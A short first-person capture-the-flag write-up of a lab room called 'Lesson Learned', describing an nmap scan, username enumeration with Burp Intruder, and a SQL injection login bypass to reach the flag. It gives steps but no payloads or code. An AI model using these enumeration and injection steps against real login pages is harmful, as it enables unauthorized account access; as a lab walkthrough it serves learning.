Yo.
This is my first writeup and if any mistakes present, kindly ignore them T_T
This room is called as 'Lesson Learned' and after I cleared it, I indeed learned a valuable lesson.
Start the machine and wait for around 5-6 seconds to boot up.
IT'S ENUMERATING TIME.
Start a nmap scan to know about the ports that its running on and other cool stuff about the victim.
You can notice that there are two ports running - one is SSH and the other one would be HTTP.
hmmmm. The HTTP one seems interesting since websites are run on where? Port 80!
Paste the IP_ADDRESS:80 on the browser. You'll be presented with a boring page actually :[
Whenever a login page is present before a script kiddie, what would he/she do? Launch SQLi like a mad person! Yes, I tried to do the same, but nah no use.
I went a level above to exploit the vulnerability, but had second thoughts, and gave a deep thought about this.
After browsing for around half-an-hour, this OWASP site's information on 'Username and password enumeration' caught my eye. It said:
The scope of this test is to verify if it is possible to collect a set of valid usernames by interacting with the authentication mechanism of the application. This test will be useful for brute force testing, in which the tester verifies if, given a valid username, it is possible to find the corresponding password.
Often, web applications reveal when a username exists on system, either as a consequence of mis-configuration or as a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that either the username is present on the system or the provided password is wrong.
Well, that's enough of information.
Indeed, "invalid username and password."
Let's try bruteforcing.
In order to do this, send that request to Burp Intruder!
Your request might look like this:
After specifying the payloads, start a sniper attack. I used the wordlist from here
Also, refer BurpSuite's documentation on how to launch a Brute-force attack using the intruder since I want you to do some heavylifting lol
While running the payload, one of the responses that I got had a change in content length. The username was 'arnold'. When I used this username in the login page with a invalid password, it throwed the below error and I knew that I'm halfway to the flag:
Then, I thought of bypassing the login with a simple SQL injection. And yes it did! Gave me a flag with the lengthy congratulations! message.
So puzzled, I tried reading it and understood I did completely the right way of SQLi. Not gonna say what was the message because I want you all to find out since it is an important lesson to be learned by us, script-kiddies. XD
And yes, will be back with more writeups/walkthroughs!
Top comments (0)